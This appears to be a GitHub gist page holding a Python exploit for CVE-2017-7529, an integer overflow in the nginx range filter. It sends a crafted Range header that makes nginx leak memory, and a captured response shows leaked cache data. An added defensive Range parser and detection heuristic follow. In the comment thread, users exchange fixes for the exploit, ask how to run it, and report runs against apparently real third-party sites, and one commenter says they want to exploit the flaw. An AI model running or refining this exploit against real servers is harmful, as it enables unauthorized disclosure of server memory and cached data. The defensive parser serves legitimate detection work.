[Exploit] CVE-2017-7529 / Nginx - Remote Integer Overflow Vulnerability
Description
Nginx versions from 0.5.6 up to and including 1.13.2 are vulnerable to an integer overflow in the nginx range filter module, which can leak potentially sensitive information when triggered by a specially crafted request.
```python
#!/usr/bin/python
# -*- coding:utf-8 -*-
# Nginx - Remote Integer Overflow Vulnerability
# CVE-2017-7529
import requests
import logging
import sys

logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)


def send_http_request(url, headers=None, timeout=8.0):
    # Issue one GET and log the status code and the Server banner.
    httpResponse = requests.get(url, headers=headers or {}, timeout=timeout)
    httpHeaders = httpResponse.headers
    log.info("status: %s: Server: %s", httpResponse.status_code, httpHeaders.get('Server', ''))
    return httpResponse


def exploit(url):
    log.info("target: %s", url)
    # First request: learn the resource's Content-Length.
    httpResponse = send_http_request(url)
    content_length = httpResponse.headers.get('Content-Length', 0)
    bytes_length = int(content_length) + 623
    # Two suffix ranges whose lengths add up past the signed 64-bit limit.
    content_length = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length)
    httpResponse = send_http_request(url, headers={ 'Range': content_length })
    # A multipart/byteranges reply carries Content-Range inside the body parts,
    # so the check looks at the response text rather than the top-level headers.
    if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
        log.info("[+] Vulnerable to CVE-2017-7529")
    else:
        log.info("[?] Unknown Vulnerable")


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("[*] %s <url>" % sys.argv[0])
        sys.exit(1)
    url = sys.argv[1]
    exploit(url)

"""
GET /proxy/demo.png HTTP/1.1
Accept-Encoding: identity
Range: bytes=-17208,-9223372036854758792
Host: 127.0.0.1:8000
Connection: close
User-Agent: Python-urllib/2.7

HTTP/1.1 206 Partial Content
Server: nginx/1.13.1
Date: Mon, 14 Aug 2017 05:53:54 GMT
Content-Type: multipart/byteranges; boundary=00000000000000000002
Connection: close
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
X-Proxy-Cache: HIT

--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-16584/16585

.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
KEY: httpGET127.0.0.1/proxy/demo.png
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2017 05:51:46 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
Accept-Ranges: bytes
Content-Length: 16585
Connection: close
Content-Type: image/png
"""
```
References
- https://nvd.nist.gov/vuln/detail/CVE-2017-7529
- https://hub.docker.com/r/vulapps/cve-2017-7529/
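As an added, defender-side example that is not part of the original gist: a Range header parser that performs the bounds checks an overflow-safe range filter needs, so the crafted two-suffix header the script sends (`bytes=-17208,-9223372036854758792` against a 16585-byte resource, as in the captured request above) is rejected while ordinary ranges pass. The total-size rule and the int64 clamp are modelled on the intent of the nginx fix, not copied from nginx; the sample inputs are constructed.

```python
import re

INT64_MAX = 2**63 - 1  # nginx stores byte offsets in a signed 64-bit off_t


def parse_range(header, content_length):
    """Return the list of (start, end) byte ranges a header asks for.

    Raises ValueError for any spec that is unsatisfiable or that would
    only pass a naive size check because of int64 wraparound. Python
    integers never overflow, so the accumulated total is exact here.
    """
    m = re.fullmatch(r"\s*bytes\s*=\s*(.+)", header)
    if not m:
        raise ValueError("not a byte-range header")
    ranges = []
    total = 0
    for spec in m.group(1).split(","):
        spec = spec.strip()
        sm = re.fullmatch(r"(\d*)-(\d*)", spec)
        if not sm or spec == "-":
            raise ValueError("malformed range spec %r" % spec)
        first, last = sm.groups()
        if first == "":
            # Suffix range "-N": the last N bytes, clamped to the resource size.
            suffix = int(last)
            if suffix > INT64_MAX:
                raise ValueError("suffix length exceeds int64: %r" % spec)
            start = max(content_length - suffix, 0)
            end = content_length - 1
        else:
            start = int(first)
            end = int(last) if last else content_length - 1
            if start > INT64_MAX or end > INT64_MAX:
                raise ValueError("offset exceeds int64: %r" % spec)
            end = min(end, content_length - 1)
        if start > end or start >= content_length:
            raise ValueError("unsatisfiable range %r" % spec)
        # Exact (non-wrapping) total: the crafted header trips this check.
        total += end - start + 1
        if total > content_length:
            raise ValueError("ranges exceed resource size: %d > %d" % (total, content_length))
        ranges.append((start, end))
    return ranges


def is_cve_2017_7529_probe(header, content_length):
    """True when the overflow-safe parser rejects the header (assumed heuristic)."""
    try:
        parse_range(header, content_length)
    except ValueError:
        return True
    return False
```

A WAF or log-review rule can call `is_cve_2017_7529_probe` with the Range header and the served object's size; legitimate multi-range clients never ask for more bytes than the resource holds.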
Hi, could you tell me how to use the exploit? Thanks!
Copy the code and paste it into Notepad on Windows (or whatever editor your OS has) and run it using the following command: python "text file name".py "URL you want to exploit"
ex: python3 test.py http://www."URL".com
Hmm, just tried the following:
docker run -d -p 80:80 -v /var/run/docker.sock:/tmp/docker.sock:ro jwilder/nginx-proxy:0.6.0
docker run -d --expose 80 -e VIRTUAL_HOST=foo.bar.com tutum/hello-world
On the host, I added 127.0.0.1 foo.bar.com to /etc/hosts to get foo.bar.com resolved.
curl -L foo.bar.com
outputs "Hello World", so the nginx-proxy is working.
python CVE-2017-7529.py http://foo.bar.com/etc/fstab
outputs
INFO:__main__:target: http://foo.bar.com/etc/fstab
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:[?] Unknown Vulnerable
According to Dockerfile and to the proxy replies the nginx-version is 1.11.10, so the bug should apply, right?
Thanks @siochs . I will try to review it.
Is there a solution for this? Is it a high-risk issue?
I found an article about this issue and it looks like there is a patch for this issue. Let's wait for the new release with this patch code. Thank you.
https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7529.html
the following configuration can be used as a temporary workaround: max_ranges 1; http://nginx.org/download/patch.2017.ranges.txt
https://access.redhat.com/security/cve/cve-2017-7529 FYI.
Still curious why the exploit does not work using a vulnerable nginx-proxy running in a docker container.
You may want to submit your exploit @ https://www.exploit-db.com/submit/
@siochs Change this: `"Content-Range" in httpResponse.text` to this: `"Content-Range" in httpResponse.headers`
This still does not seem to work and I get the same error as @siochs . Any further suggestions ?
It didn't work for me as well.
Didn't work for me as well.. same output for me also:
INFO:__main__:target: http://www.examlpe.com
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:[?] Unknown Vulnerable
what version of python are you all using? sometimes if the version isn't correct python gives out errors.
I get the same error as @siochs. Any idea how to resolve it?
INFO:__main__:[?] Unknown Vulnerable
Same error here too:
INFO:__main__:status: 200: Server: nginx
INFO:__main__:status: 200: Server: nginx
INFO:__main__:[?] Unknown Vulnerable
Same error here too:
INFO:__main__:target: https://url.com
INFO:__main__:status: 200: Server: nginx/1.12.1
INFO:__main__:status: 200: Server: nginx/1.12.1
INFO:__main__:[?] Unknown Vulnerable
Same error here too:
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): site.com
INFO:__main__:status: 416: Server: nginx/1.10.3 (Ubuntu)
INFO:__main__:[?] Unknown Vulnerable
Any idea?
Not vulnerable: 1.13.3+, 1.12.1+ Vulnerable: 0.5.6-1.13.2
Change `"Content-Range" in httpResponse.text` to `"Content-Range" in httpResponse.headers`
I got httpResponse.status_code == 200
Is that OK?
The same error.
INFO:__main__:target: (http://www.****.com)
INFO:__main__:status: 200: Server: nginx/1.8.0
INFO:__main__:status: 200: Server: nginx/1.8.0
INFO:__main__:[?] Unknown Vulnerable
Hey, I find nginx/1.13.9 CVE???
The line
```python
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
```
needs to be replaced by
```python
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
```
I am looking for nginx1.14.1 cve. Is there ??
in line if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text: need to be replaced by httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
After that change, I'm still getting:
INFO:__main__:status: 200: Server: nginx/1.10.3
INFO:__main__:[?] Unknown Vulnerable
Any idea?
Hello, I got here while searching for an exploit from a HTB system.
To everyone getting the "Unknown Vulnerable" error - update the code like so, starting at line 32:
```python
httpResponse = send_http_request(url, headers={ 'Range': content_length })
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
    log.info("[+] Vulnerable to CVE-2017-7529")
else:
    print("[!] Target not vulnerable: HTTP response code: "+str(httpResponse.status_code))
```
This way, you can actually see the HTTP response code from the target server. If it's not "206", as the logic in the exploit test code expects (`if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers`), then the server could already be patched for this vulnerability.
This is probably the case if Nginx is installed from the distribution's package repositories.
I hope that this helps. ~Douglas
Hello, we've updated our Nginx to the new version 1.15.9 but are still getting the "Vulnerable to CVE-2017-7529" message. Why is it still showing that message instead of "Unknown Vulnerable" after we updated to the latest version? Can anyone give any inputs? Thanks!
INFO:__main__:status: 200: Server:
INFO:__main__:status: 206: Server:
INFO:__main__:[+] Vulnerable to CVE-2017-7529
It appears that nginx/1.12.1 isn't vulnerable, but it is in the range 0.5.6 - 1.13.2. Can someone verify this please??
This Python script does work. The URL needs to be something like http://xxx/yyy/zzz.png, and you should also modify nginx.conf so that the URL can be accessed.
```python
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
```
NOT
```python
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
```
We need an image file to do this. `ngx_http_range_header_filter()` checks `r->allow_range`, which is set when the file acquired is an image.
I compiled nginx 1.14.0 without this patch.
```
test@ubuntu:~/Desktop$ python cve-2017-7529.py http://127.0.0.1/images/demo.png
INFO:__main__:target: http://127.0.0.1/images/demo.png
INFO:__main__:status: 200: Server: nginx/1.14.0 (Ubuntu)
INFO:__main__:status: 206: Server: nginx/1.14.0 (Ubuntu)
{'Server': 'nginx/1.14.0 (Ubuntu)', 'Last-Modified': 'Tue, 14 May 2019 08:34:34 GMT', 'Connection': 'keep-alive', 'ETag': '"5cda7d9a-eba5"', 'Date': 'Tue, 14 May 2019 09:01:44 GMT', 'Content-Type': 'multipart/byteranges; boundary=00000000000000000002'}
--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-60324/60325
```
INFO:__main__:[+] Vulnerable to CVE-2017-7529
I fixed up this exploit and made it into a nice little gist: https://gist.github.com/thehappydinoa/bc3278aea845b4f578362e9363c51115
Can anyone tell me what this response means? I want to exploit this vuln.
INFO:__main__:status: 200: Server: nginx/1.10.3
INFO:__main__:status: 200: Server: nginx/1.10.3
INFO:__main__:[?] Unknown Vulnerable
The gist ignores snorez's advice to look for Content-Range in the response text as opposed to the header.
@snorez Will HTTPS not work for reproducing this exploit?